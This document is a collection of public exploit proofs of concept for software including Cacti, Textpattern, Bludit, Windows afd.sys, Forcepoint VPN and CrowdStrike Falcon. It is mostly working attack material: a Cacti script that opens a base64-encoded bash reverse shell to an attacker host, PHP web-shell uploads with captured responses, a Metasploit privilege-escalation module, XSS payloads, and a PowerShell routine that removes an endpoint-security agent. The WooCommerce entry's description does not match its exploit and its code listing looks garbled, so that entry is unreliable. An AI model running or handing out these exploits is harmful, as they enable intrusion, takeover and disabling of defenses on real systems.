<pre><code># Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)<br /># Date: 2022-12-04<br /># Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl><br /># Vendor Homepage: https://mirage.io/blog/MSA03<br /># Software Link: https://github.com/mirage/qubes-mirage-firewall/releases<br /># Version: >= 0.8.0 & < 0.8.4<br /># Tested on: Qubes OS<br /># CVE: CVE-2022-46770<br /><br />#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166<br /><br />#!/usr/bin/env python3<br /><br />from socket import socket, AF_INET, SOCK_DGRAM<br /><br />TARGET = "239.255.255.250"<br /><br />PORT = 5353<br /><br />PAYLOAD = b'a' * 607<br /><br />s = socket(AF_INET, SOCK_DGRAM)<br /><br />s.sendto(PAYLOAD, (TARGET, PORT))<br /> <br /><br /></code></pre>
<pre><code># Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)<br /># Date: 2022-12-07<br /># Author: Milad Karimi<br /># Vendor Homepage: https://wordpress.org/plugins/woocommerce<br /># Software Link: https://wordpress.org/plugins/woocommerce<br /># Tested on: windows 10 , firefox<br /># Version: 7.1.0<br /># CVE : N/A<br /><br /># Description:<br />simple, easy to use jQuery frontend to php backend that pings various<br />devices and changes colors from green to red depending on if device is<br />up or down.<br /><br /># PoC :<br /><br />http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php<br />http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php<br /><br /><br /># Vulnerabile code:<br /><br /> 95: $classname $classname($post_id); <br /> 94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); <br /> 92: ⇓ function save($post_id, $post)<br /> 93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); <br /> 92: ⇓ function save($post_id, $post)<br /><br /></code></pre>
<pre><code># Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)<br /># Exploit Author: Riadh BOUCHAHOUA<br /># Discovery Date: 2022-12-08 <br /># Vendor Homepage: https://www.cacti.net/<br /># Software Links : https://github.com/Cacti/cacti<br /># Tested Version: 1.2.2x <= 1.2.22<br /># CVE: CVE-2022-46169<br /># Tested on OS: Debian 10/11<br /><br />#!/usr/bin/env python3<br />import random<br />import httpx, urllib<br /><br />class Exploit:<br /> def __init__(self, url, proxy=None, rs_host="",rs_port=""):<br /> self.url = url <br /> self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)<br /> self.rs_host = rs_host<br /> self.rs_port = rs_port<br /><br /> def exploit(self):<br /> # cacti local ip from the url for the X-Forwarded-For header<br /> local_cacti_ip = self.url.split("//")[1].split("/")[0]<br /> <br /> headers = {<br /> 'X-Forwarded-For': f'{local_cacti_ip}'<br /> }<br /> <br /> revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"<br /> import base64<br /> b64_revshell = base64.b64encode(revshell.encode()).decode()<br /> payload = f";echo {b64_revshell} | base64 -d | bash -"<br /> payload = urllib.parse.quote(payload)<br /> urls = []<br /> <br /> # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)<br /> for host_id in range(1,100):<br /> for local_data_ids in range(1,100):<br /> urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")<br /> <br /> for url in urls:<br /> r = self.session.get(url,headers=headers)<br /> print(f"{r.status_code} - {r.text}" )<br /> pass<br /><br /> def random_user_agent(self):<br /> ua_list = [<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64; 
rv:89.0) Gecko/20100101 Firefox/89.0",<br /> ]<br /> return random.choice(ua_list)<br /><br />def parse_args():<br /> import argparse<br /> <br /> argparser = argparse.ArgumentParser()<br /> argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")<br /> argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)<br /> argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)<br /> return argparser.parse_args()<br /><br />def main() -> None:<br /> # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL <br /> args = parse_args()<br /> e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)<br /> e.exploit()<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://textpattern.com/<br /># Version : 4.8.8<br /># Tested on: windows 11 xammp | Kali linux<br /># Category: WebApp<br /># Google Dork: intext:"Published with Textpattern CMS"<br /># Date: 10/09/2022<br />#<br />######## Description ########<br />#<br /># Step 1: Login admin account and go settings of site<br /># Step 2: Upload a file to web site and selecet the rce.php<br /># Step3 : Upload your webshell that's it...<br />#<br />######## Proof of Concept ########<br /><br /><br />========>>> START REQUEST <<<=========<br /><br /><br /><br /><br />############# POST REQUEST (FILE UPLOAD) ############################## (1)<br /><br />POST /textpattern/index.php?event=file HTTP/1.1<br />Host: localhost<br />Content-Length: 1038<br />sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"<br />Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/textpattern/index.php?event=file<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin<br />Connection: close<br /><br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="fileInputOrder"<br /><br />1/1<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br 
/>Content-Disposition: form-data; name="app_mode"<br /><br />async<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="MAX_FILE_SIZE"<br /><br />2000000<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="event"<br /><br />file<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="step"<br /><br />file_insert<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="id"<br /><br /><br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="_txp_token"<br /><br />16ea3b64ca6379aee9599586dae73a5d<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="thefile[]"; filename="rce.php"<br />Content-Type: application/octet-stream<br /><br /><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br />------WebKitFormBoundaryMgUEFltFdqBVvdJu--<br /><br /><br />############ POST RESPONSE (FILE UPLOAD) ######### (1)<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 10 Sep 2022 15:28:57 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6<br />X-Powered-By: PHP/8.1.6<br />X-Textpattern-Runtime: 35.38 ms<br />X-Textpattern-Querytime: 9.55 ms<br />X-Textpattern-Queries: 16<br />X-Textpattern-Memory: 2893 kB<br />Content-Length: 270<br />Connection: close<br />Content-Type: text/javascript; charset=utf-8<br /><br />___________________________________________________________________________________________________________________________________________________<br /><br />############ REQUEST TO THE PAYLOAD ############################### (2)<br /><br />GET /files/c.php?cmd=whoami HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: txp_login_public=4353608be0admin<br />Connection: close<br /><br /><br />############ RESPONSE THE PAYLOAD ############################### (2)<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 10 Sep 2022 15:33:06 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6<br />X-Powered-By: PHP/8.1.6<br />Content-Length: 29<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><pre>alpernae\alperen<br /></pre><br /><br />========>>> END REQUEST <<<=========<br /><br /></code></pre>
<pre><code># Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.bludit.com/<br /># Version : 3-14-1<br /># Tested on: windows 11 wampserver | Kali linux<br /># Category: WebApp<br /># Google Dork: intext:'2022 Powered by Bludit'<br /># Date: 8.12.2022<br />######## Description ########<br />#<br /># Step 1 : Archive as a zip your webshell (example: payload.zip)<br /># Step 2 : Login admin account and download 'UploadPlugin'<br /># Step 3 : Go to UploadPlugin section<br /># Step 4 : Upload your zip<br /># Step 5 : target/bl-plugins/[your_payload]<br />#<br />######## Proof of Concept ########<br /><br /><br />==============> START REQUEST <========================================<br /><br />POST /admin/plugin/uploadplugin HTTP/2<br />Host: localhost<br />Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264<br />Content-Length: 1820<br />Origin: https://036e-88-235-222-210.eu.ngrok.io<br />Dnt: 1<br />Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="tokenCSRF"<br /><br />b6487f985b68f2ac2c2d79b4428dda44696d6231<br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="pluginorthemes"<br /><br />plugins<br 
/>-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="zip_file"; filename="a.zip"<br />Content-Type: application/zip<br /><br />PK †eˆU  a/PK  ”fˆUÆ ª)¢ Ä<br /> a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @V꺭!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtO̤Ҝ.<br />×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á<br />RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“<br />j±u<br />\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%<br />µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.<br />îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï<br />e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷<br />kC57j©'Î"m<br /> ã®ho¹ xŸô Û;’œcçzÙQ<br />Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~t6á¾,…ÅèçO´ÇÆ×Σv²±ãÿbÑڒ‘Ug[;pq›eÓÜÅØÿéJ<br />Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU  $ €íA a/<br />   þš®,<br />Ù þš®,<br />Ù€ø¨j.<br />ÙPK?  
”fˆUÆ ª)¢ Ä<br /> $ €¤ a/a.php<br />   ¤eÝ-<br />Ù ÷C-<br />Ù bj.<br />ÙPK   ­ ç <br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="submit"<br /><br />Upload<br />-----------------------------308003478615795926433430552264--<br /><br /><br />==============> END REQUEST <========================================<br /><br />## WEB SHELL UPLOADED!<br /><br />==============> START RESPONSE <========================================<br /><br />HTTP/2 200 OK<br />Cache-Control: no-store, no-cache, must-revalidate<br />Content-Type: text/html; charset=UTF-8<br />Date: Thu, 08 Dec 2022 18:01:43 GMT<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4<br />Pragma: no-cache<br />Server: Apache/2.4.51 (Win64) PHP/7.4.26<br />X-Powered-By: Bludit<br />.<br />.<br />.<br />.<br /><br />==============> END RESPONSE <========================================<br /><br /># REQUEST THE WEB SHELL<br /><br />==============> START REQUEST <========================================<br /><br />GET /bl-plugins/a/a.php?cmd=whoami HTTP/2<br />Host: localhost<br />Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />==============> END REQUEST <========================================<br /><br />==============> START RESPONSE <========================================<br /><br />HTTP/2 200 OK<br />Content-Type: text/html; charset=UTF-8<br />Date: Thu, 08 Dec 2022 18:13:14 GMT<br />Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919<br />Server: Apache/2.4.51 (Win64) 
PHP/7.4.26<br />X-Powered-By: PHP/7.4.26<br />Content-Length: 32<br /><br /><pre>nt authority\system<br /></pre><br /><br />==============> END RESPONSE <========================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> include Msf::Post::Windows::FileInfo<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> {<br /> 'Name' => 'Ancillary Function Driver (AFD) for WinSock Elevation of Privilege',<br /> 'Description' => %q{<br /> A vulnerability exists in the Windows Ancillary Function Driver for Winsock<br /> (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of<br /> NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is<br /> possible to create an arbitrary kernel Write-Where primitive, which can be used<br /> to manipulate internal I/O ring structures and achieve local privilege<br /> escalation.<br /><br /> This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in<br /> January 2023 updates).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'chompie', # Github PoC<br /> 'b33f', # Github PoC<br /> 'Yarden Shafir', # I/O Ring R/W primitive PoC<br /> 'Christophe De La Fuente' # Metasploit module<br /> ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Platform' => 'win',<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [ 'Windows 11 22H2 x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'References' => [<br /> [ 'CVE', '2023-21768' ],<br /> [ 'URL', 'https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768' ],<br /> [ 'URL', 'https://github.com/yardenshafir/IoRingReadWritePrimitive' ]<br /> ],<br /> 'DisclosureDate' => '2023-01-10',<br 
/> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => []<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> unless session.platform == 'windows'<br /> return Exploit::CheckCode::Safe('Only Windows systems are affected')<br /> end<br /><br /> major, minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntoskrnl.exe')<br /> vprint_status("Windows Build Number = #{build}.#{revision}")<br /><br /> unless major == 6 && minor == 2 && build == 22621<br /> return CheckCode::Safe('The exploit only supports Windows 11 22H2')<br /> end<br /><br /> if revision > 963<br /> return CheckCode::Safe("This Windows host seems to be patched (build 22621.#{revision})")<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br /><br /> if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')<br /> end<br /><br /> encoded_payload = payload.encoded<br /> execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21768', 'CVE-2023-21768.x64.dll'),<br /> [encoded_payload.length].pack('I<') + encoded_payload<br /> )<br /><br /> print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) <br /># Google Dork: N/A<br /># Date: 12/6/2022<br /># Exploit Author: @casp3r0x0 hassan ali al-khafaji<br /># Vendor Homepage: https://www.eve-ng.net/<br /># Software Link: https://www.eve-ng.net/index.php/download/<br /># Version: Free EVE Community Edition Version 5.0.1-13<br /># Tested on: Free EVE Community Edition Version 5.0.1-13<br /># CVE : N/A<br /><br /><br /><br /># We could achieve stored XSS on EVE-NG Free; I don't know if this<br /># also affects the Pro version.<br /># First, create a new lab.<br /># Second, create a Text label.<br /># Insert the XSS payload and click Save: "><script>alert(1)</script><br /># The application is multi-user: if any user opens the lab, the XSS will be triggered.<br /><br /></code></pre>
<pre><code># Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)<br /># Date: 2022-12-05<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/wpforms-lite<br /># Version: 1.7.8<br /># Tested on: Windows 10<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates WPForms from any post type. The slider import search feature and the tab parameter in the plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script><br /><br /></code></pre>
<pre><code># Exploit Author : TOUHAMI KASBAOUI<br /># Vendor Homepage : https://www.forcepoint.com/ <br /># Software: Stonesoft VPN Windows<br /># Version : 6.2.0 / 6.8.0<br /># Tested on : Windows 10<br /># CVE : N/A<br />#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM<br /><br />#define UNICODE<br />#define _UNICODE<br />#include <Windows.h><br />#include <iostream><br /><br />using namespace std;<br />enum Result<br />{<br /> unknown,<br /> serviceManager_AccessDenied,<br /> serviceManager_DatabaseDoesNotExist,<br /> service_AccessDenied,<br /> service_InvalidServiceManagerHandle,<br /> service_InvalidServiceName,<br /> service_DoesNotExist,<br /> service_Exist<br />};<br /><br />Result ServiceExists(const std::wstring& serviceName)<br />{<br /> Result r = unknown;<br /><br /> SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);<br /><br /> if (manager == NULL)<br /> {<br /> DWORD lastError = GetLastError();<br /><br /> if (lastError == ERROR_ACCESS_DENIED)<br /> return serviceManager_AccessDenied;<br /> else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)<br /> return serviceManager_DatabaseDoesNotExist;<br /> else<br /> return unknown;<br /> }<br /><br /> SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);<br /><br /> if (service == NULL)<br /> {<br /> DWORD error = GetLastError();<br /><br /> if (error == ERROR_ACCESS_DENIED)<br /> r = service_AccessDenied;<br /> else if (error == ERROR_INVALID_HANDLE)<br /> r = service_InvalidServiceManagerHandle;<br /> else if (error == ERROR_INVALID_NAME)<br /> r = service_InvalidServiceName;<br /> else if (error == ERROR_SERVICE_DOES_NOT_EXIST)<br /> r = service_DoesNotExist;<br /> else<br /> r = unknown;<br /> }<br /> else<br /> r = service_Exist;<br /><br /> if (service != NULL)<br /> CloseServiceHandle(service);<br /><br /> if (manager != NULL)<br /> CloseServiceHandle(manager);<br /><br /> return r;<br />}<br /><br />bool 
ChangeName() {<br /> LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";<br /> LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";<br /> bool success = MoveFile(parrentvpnfilename, newName);<br /> if (success) {<br /> cerr << "[+] SVGVPN filename changed.\n";<br /> }<br /> else {<br /> cerr << "Failed to rename file \n";<br /> }<br /> return 0;<br />}<br /><br />int main() {<br /><br /> const uint8_t shellcode[7168] = {<br /> 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,<br /> 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br /> }; //You can set array bin of your reverse shell PE file here<br /><br /> std::wstring serviceName = L"sgipsecvpn";<br /> Result result = ServiceExists(serviceName);<br /> if (result == service_Exist)<br /> std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;<br /> else if (result == service_DoesNotExist)<br /> std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;<br /> else<br /> std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." 
<< std::endl;<br /> ChangeName();<br /> HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";<br /> if (fileHandle == INVALID_HANDLE_VALUE) {<br /> cerr << "Failed to create shellcode\n";<br /> return 1;<br /> }<br /><br /> DWORD bytesWritten;<br /> if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {<br /> cerr << "Failed to write to file\n";<br /> CloseHandle(fileHandle);<br /> return 1;<br /> }<br /> CloseHandle(fileHandle);<br /><br /> cout << "[+] Payload exported to ForcePointVPN \n";<br /> Sleep(30);<br /> cout << "[+] Restart ForcePointVPN Service \n";<br /> SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);<br /> SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);<br /><br /> SERVICE_STATUS serviceStatus;<br /> QueryServiceStatus(serviceHandle, &serviceStatus);<br /> if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {<br /> ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);<br /> while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {<br /> QueryServiceStatus(serviceHandle, &serviceStatus);<br /> Sleep(1000);<br /> }<br /> }<br /> StartService(serviceHandle, NULL, NULL);<br /><br /> CloseServiceHandle(serviceHandle);<br /> CloseServiceHandle(scmHandle);<br /><br /> return 0;<br />}<br /></code></pre>
<pre><code># Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token <br /># Date: 30/11/2022 <br /># Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) <br /># Vendor Homepage: https://www.crowdstrike.com/ <br /># Author Homepage: https://www.deda.cloud/ <br /># Tested On: All Windows versions <br /># Version: 6.44.15806 <br /># CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. <br /><br /><br />$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"<br /><br />foreach($obj in $InstalledSoftware){<br /> if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))<br /> {<br /> $uninstall_uuid = $obj.Name.Split("\")[6]<br /> }<br />}<br /><br />$g_msiexec_instances = New-Object System.Collections.ArrayList<br /><br />Write-Host "[+] Identified installed Falcon: $uninstall_uuid"<br />Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."<br />Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"<br /><br />while($true)<br />{<br /> if (get-process -Name "CSFalconService") {<br /> Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {<br /> <br /> if (-Not $g_msiexec_instances.contains($_.id)){<br /> $g_msiexec_instances.Add($_.id)<br /> if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){<br /> Start-Sleep -Milliseconds 100<br /> Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]<br /> stop-process -Force -Id $g_msiexec_instances[-1] <br /> }<br /><br /> }<br /> <br /> }<br /> } else { <br /> Write-Host "[+] CSFalconService process vanished...reboot and have fun!"<br /> break<br /> }<br />}<br /><br /></code></pre>